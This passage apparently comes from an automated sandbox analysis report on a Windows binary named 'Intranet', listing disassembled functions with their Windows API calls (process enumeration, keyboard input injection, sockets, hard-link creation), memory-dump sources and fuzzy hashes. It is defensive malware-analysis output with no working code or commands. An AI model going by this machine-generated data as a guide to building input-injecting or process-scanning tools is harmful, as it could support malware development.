                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6ce1c6228e5efed9e3077c2a7cd69010ca3a3fd2081415aeb4bcabda94d74db3
                                                                            • Instruction ID: f6203de173c63004a00d503d8651f52e909d69304c4dfd81761f6c6f098d355d
                                                                            • Opcode Fuzzy Hash: 6ce1c6228e5efed9e3077c2a7cd69010ca3a3fd2081415aeb4bcabda94d74db3
                                                                            • Instruction Fuzzy Hash: 8A51F93060870A9BEB209F79C895A3EB7E4AF44324B20981FE756C77E1DB7C9841870D
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0051F526
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0051F534
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0051F5F4
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0051F603
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                            • String ID:
                                                                            • API String ID: 2576544623-0
                                                                            • Opcode ID: dc98bfc9ed589b2d383274432037a9a9062daf4aec3598067ee9c83e4f5350af
                                                                            • Instruction ID: 90d081a09d4a6bf7a92999ca4247229dae4e9c48890359a7e77d499d02d7a661
                                                                            • Opcode Fuzzy Hash: dc98bfc9ed589b2d383274432037a9a9062daf4aec3598067ee9c83e4f5350af
                                                                            • Instruction Fuzzy Hash: C9517B71504311AFD310EF21D895EAFBBE8FF95704F40492EF485972A1EB74A908CBA6
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?,?,?,00000002,?,?), ref: 00529E88
                                                                            • ScreenToClient.USER32(00000002,00000002,?,?,00000002,?,?), ref: 00529EBB
                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00529F28
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientMoveRectScreen
                                                                            • String ID:
                                                                            • API String ID: 3880355969-0
                                                                            • Opcode ID: 190faedceb677599de0fcae56a4c3f0bff72bcb7735beaddf49a81f66e5b452e
                                                                            • Instruction ID: 38551d5f8fbfe633411468905359eaf2a90b7d5a6037e894b537de24a1f8bec0
                                                                            • Opcode Fuzzy Hash: 190faedceb677599de0fcae56a4c3f0bff72bcb7735beaddf49a81f66e5b452e
                                                                            • Instruction Fuzzy Hash: 4B515E34A00219AFDF11DF58D9849AE7BB6FF95320F118669F825DB3A0D730AD81DB90
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                            • String ID:
                                                                            • API String ID: 2782032738-0
                                                                            • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                            • Instruction ID: b920bf8f17685ee2f6acc13899fd23695cba20aad25efa839c812cf53c6f54b9
                                                                            • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                            • Instruction Fuzzy Hash: AB41FA796006159BDB98CE79C6A0F6F7BA5AFC0360B14813FE41587740D739DD418B4C
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 004FA68A
                                                                            • __itow.LIBCMT ref: 004FA6BB
                                                                              • Part of subcall function 004FA90B: SendMessageW.USER32(?,0000113E,00000000,00000000,?,00000000,00000028,00000800,?,00000028,?,?,?,00000000), ref: 004FA976
                                                                            • SendMessageW.USER32(?,0000110A,00000001,?,?,0000110A,00000004,00000000), ref: 004FA724
                                                                            • __itow.LIBCMT ref: 004FA77B
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$__itow
                                                                            • String ID:
                                                                            • API String ID: 3379773720-0
                                                                            • Opcode ID: 9d2df9333d46d9ec211cf7faac9922a872286b7a0df39f0de50e067ce5c0fc69
                                                                            • Instruction ID: c220c3ab25c8760af1d6ae53df6774d0f4ec94f191d5c83c957a13b0d6bc8987
                                                                            • Opcode Fuzzy Hash: 9d2df9333d46d9ec211cf7faac9922a872286b7a0df39f0de50e067ce5c0fc69
                                                                            • Instruction Fuzzy Hash: 6141B4B4A0030C6BDF11EF51C855FFE7BB9EF44354F40002AFA4593291DB789954C6A6
                                                                            APIs
                                                                            • #23.WSOCK32(00000002,00000002,00000011), ref: 005170BC
                                                                            • #111.WSOCK32(00000000), ref: 005170CC
                                                                              • Part of subcall function 004A4D37: __itow.LIBCMT ref: 004A4D62
                                                                              • Part of subcall function 004A4D37: __swprintf.LIBCMT ref: 004A4DAC
                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00517130
                                                                            • #111.WSOCK32(00000000), ref: 0051713C
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: #111$__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 3577594119-0
                                                                            • Opcode ID: 5187b6225414b2dc666ebaf3a614b76ec95e640e0414e87b557e45a105904cb3
                                                                            • Instruction ID: cf3d8c0b01b7003732faa55706dc5aa9831097ec187d3db8b43c49446b625326
                                                                            • Opcode Fuzzy Hash: 5187b6225414b2dc666ebaf3a614b76ec95e640e0414e87b557e45a105904cb3
                                                                            • Instruction Fuzzy Hash: 6D41C3757402006FE720AF25DC86FAE77E4EB95B18F04845DFA599B3C2DBB89C008B95
                                                                            APIs
                                                                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00530980), ref: 00516B92
                                                                            • _strlen.LIBCMT ref: 00516BC4
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen
                                                                            • String ID:
                                                                            • API String ID: 4218353326-0
                                                                            • Opcode ID: e75633086a66b92999b8251a909e0db8ce03a5b4db6c835bb6801a80d92e99b5
                                                                            • Instruction ID: 414480b22052154f3c18ffae35590e9d50326d6fd31267f426c1efbdfb44e7ca
                                                                            • Opcode Fuzzy Hash: e75633086a66b92999b8251a909e0db8ce03a5b4db6c835bb6801a80d92e99b5
                                                                            • Instruction Fuzzy Hash: BC411531600108AFD714EB65CD91EFEBBA9FF54318F10815AF91A9B292DB34AD41C794
                                                                            APIs
                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0050BEE1
                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0050BF07
                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0050BF2C
                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0050BF58
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 3321077145-0
                                                                            • Opcode ID: fb6adbdf532e1157eb676d1563064147a2983d81d9e8d8ee2ef6b150cacc62fc
                                                                            • Instruction ID: 99495120b8dd124cb21dfe5ae31bdf97e18ba8526ff833a6189e5b77523fd79c
                                                                            • Opcode Fuzzy Hash: fb6adbdf532e1157eb676d1563064147a2983d81d9e8d8ee2ef6b150cacc62fc
                                                                            • Instruction Fuzzy Hash: AC415B39600A11DFCB11EF15C585A5DBBE1FF99324B08C489E8499B3A2CB78FD02DB95
                                                                            APIs
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00528F03
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: InvalidateRect
                                                                            • String ID:
                                                                            • API String ID: 634782764-0
                                                                            • Opcode ID: 980da5991dc724ea01904a0bfca724bd9e604165a5513e13f3bdcd9fc9dd88bc
                                                                            • Instruction ID: c3b4374770b134e09ba42cac2d36ca874dafc17dcedaaf2b4c8d8235b06e6dd8
                                                                            • Opcode Fuzzy Hash: 980da5991dc724ea01904a0bfca724bd9e604165a5513e13f3bdcd9fc9dd88bc
                                                                            • Instruction Fuzzy Hash: 1C31E334602229AFEF249A98ED85BB83FA6FF1B310F144901FA11D62E1CF70D954DA51
                                                                            APIs
                                                                            • ClientToScreen.USER32(?,?,?,?,?,?,?,?,?,0052C6BC,?,?,?), ref: 0052B1D2
                                                                            • GetWindowRect.USER32(?,?), ref: 0052B248
                                                                            • PtInRect.USER32(?,?,0052C6BC,?,?), ref: 0052B258
                                                                            • MessageBeep.USER32(00000000,?,?,?,?,0052C6BC,?,?,?), ref: 0052B2C9
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 1352109105-0
                                                                            • Opcode ID: 8672d07e99ef7d528ac571c3d8578b2948e0ebbcb731806eeba513a2d9f9b071
                                                                            • Instruction ID: ab118c53e06ec170971322455b302c8b75b2008ba079705027db1e591ff86c91
                                                                            • Opcode Fuzzy Hash: 8672d07e99ef7d528ac571c3d8578b2948e0ebbcb731806eeba513a2d9f9b071
                                                                            • Instruction Fuzzy Hash: DE419134604229DFEF11CF98E884A9D7BF5FF9A314F1884A5E4189B290D330A845DB50
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00501326
                                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00501342
                                                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001,00000000,?,00000001), ref: 005013A8
                                                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 005013FA
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            • Opcode ID: 1b64a62373af3397c1cce3a9a3819c28f9649c26e7a473b525944f7a5e1a91ed
                                                                            • Instruction ID: 39689ec1b3514c613e6a69efc5c1811074cb71a0a8df4f6cb89b0970d08e4d95
                                                                            • Opcode Fuzzy Hash: 1b64a62373af3397c1cce3a9a3819c28f9649c26e7a473b525944f7a5e1a91ed
                                                                            • Instruction Fuzzy Hash: 98316E30940A08AFFF358A258C09BFE7FB5BB44310F084B1AF591526D1D3748D559B5B
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,000BECBC,?,00008000), ref: 00501465
                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00501481
                                                                            • PostMessageW.USER32(00000000,00000101,00000000,?,?,00008000), ref: 005014E0
                                                                            • SendInput.USER32(00000001,?,0000001C,000BECBC,?,00008000), ref: 00501532
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            • Opcode ID: e976c4247ca4de3389869edecd2d858285137f1af98f0fe77b56acd71580d4c7
                                                                            • Instruction ID: 83cb0cd46c4749baf8517558fa9421cf9c712c756b37efdbe48506e4596833b5
                                                                            • Opcode Fuzzy Hash: e976c4247ca4de3389869edecd2d858285137f1af98f0fe77b56acd71580d4c7
                                                                            • Instruction Fuzzy Hash: 08314930A40F199EFF348A659C09BFEBFA5BB85310F08431AE481561E1C37989559B6B
                                                                            APIs
                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004D642B
                                                                            • __isleadbyte_l.LIBCMT ref: 004D6459
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 004D6487
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 004D64BD
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                            • String ID:
                                                                            • API String ID: 3058430110-0
                                                                            • Opcode ID: 9b2bef1810401af00849b5f6b66a61b755a83443e7aba97c5f2a0a7b9450114c
                                                                            • Instruction ID: 84194847ba3ecd3cb61a7c8f6e9bbd5035246b5fd37e1e5ed496175a9c267886
                                                                            • Opcode Fuzzy Hash: 9b2bef1810401af00849b5f6b66a61b755a83443e7aba97c5f2a0a7b9450114c
                                                                            • Instruction Fuzzy Hash: A331B031600256AFDB218F65CC54BAB7BA5FF41320F16412BE86487391DB39E851DB58
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 0052553F
                                                                              • Part of subcall function 00503B34: GetWindowThreadProcessId.USER32(?,00000000,00000000,?,005055C0), ref: 00503B4E
                                                                              • Part of subcall function 00503B34: GetCurrentThreadId.KERNEL32 ref: 00503B55
                                                                              • Part of subcall function 00503B34: AttachThreadInput.USER32(00000000,?,005055C0), ref: 00503B5C
                                                                            • GetCaretPos.USER32(?), ref: 00525550
                                                                            • ClientToScreen.USER32(00000000,?), ref: 0052558B
                                                                            • GetForegroundWindow.USER32 ref: 00525591
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                            • String ID:
                                                                            • API String ID: 2759813231-0
                                                                            • Opcode ID: e677c8fa23df4bbeae6f21c2f22e161977d98494aa9d2ac3069999ccf5ef6d90
                                                                            • Instruction ID: 767b8ff7471be99232105b6284934ed03f8dcc0762ffd41a31b6187861c7e979
                                                                            • Opcode Fuzzy Hash: e677c8fa23df4bbeae6f21c2f22e161977d98494aa9d2ac3069999ccf5ef6d90
                                                                            • Instruction Fuzzy Hash: 9A314E71900108AFDB00EFB6D8859EEB7F9EF99304F10446AE501E7241EA75AE448BA4
                                                                            APIs
                                                                              • Part of subcall function 004A29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1CE4,?), ref: 004A29F3
                                                                            • GetCursorPos.USER32(?,?,?,?,?,?,?,?,004DBCEC,?,?,?,?,?), ref: 0052CB7A
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,004DBCEC,?,?,?,?,?), ref: 0052CB8F
                                                                            • GetCursorPos.USER32(?,?,?,?,?,?,?,?,?,004DBCEC,?,?,?,?,?), ref: 0052CBDC
                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,004DBCEC,?,?,?), ref: 0052CC16
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                            • String ID:
                                                                            • API String ID: 2864067406-0
                                                                            • Opcode ID: cb1531accce4636a907a5ad9b4246b425b2ef8223c0e41ff0a4dcc1c19adfc75
                                                                            • Instruction ID: 64095e022a208f93bbaa1c8c1d1ca8e1af530dd754490365bb5ef4eac8a76ed8
                                                                            • Opcode Fuzzy Hash: cb1531accce4636a907a5ad9b4246b425b2ef8223c0e41ff0a4dcc1c19adfc75
                                                                            • Instruction Fuzzy Hash: B531C134600168AFCB259F59D859EBE7FB9FF4A310F444099F9099B2A2C3315D50EFA0
                                                                            APIs
                                                                            • __setmode.LIBCMT ref: 004C0BE2
                                                                              • Part of subcall function 004B402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00507E51,?,?,00000000), ref: 004B4041
                                                                              • Part of subcall function 004B402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00507E51,?,?,00000000,?,?), ref: 004B4065
                                                                            • _fprintf.LIBCMT ref: 004C0C19
                                                                            • OutputDebugStringW.KERNEL32(?), ref: 004F694C
                                                                              • Part of subcall function 004C4CCA: _flsall.LIBCMT ref: 004C4CE3
                                                                            • __setmode.LIBCMT ref: 004C0C4E
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
